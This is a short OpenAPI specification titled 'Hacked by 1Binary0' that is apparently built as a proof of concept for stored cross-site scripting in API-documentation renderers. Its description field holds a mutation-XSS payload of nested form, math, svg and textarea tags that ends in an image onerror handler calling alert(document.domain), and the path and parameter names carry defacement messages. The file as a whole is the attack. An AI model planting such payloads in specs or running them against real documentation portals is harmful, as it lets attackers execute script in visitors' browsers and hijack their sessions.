---
openapi: 3.0.1
info:
  title: Hacked by 1Binary0
  description: |
   <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src>"></form>
   
  version: '1.0'
paths:
  "/path/malformed/by/afine":
    post:
      tags:
      - Hacked
      parameters:
      - name: You have been hacked
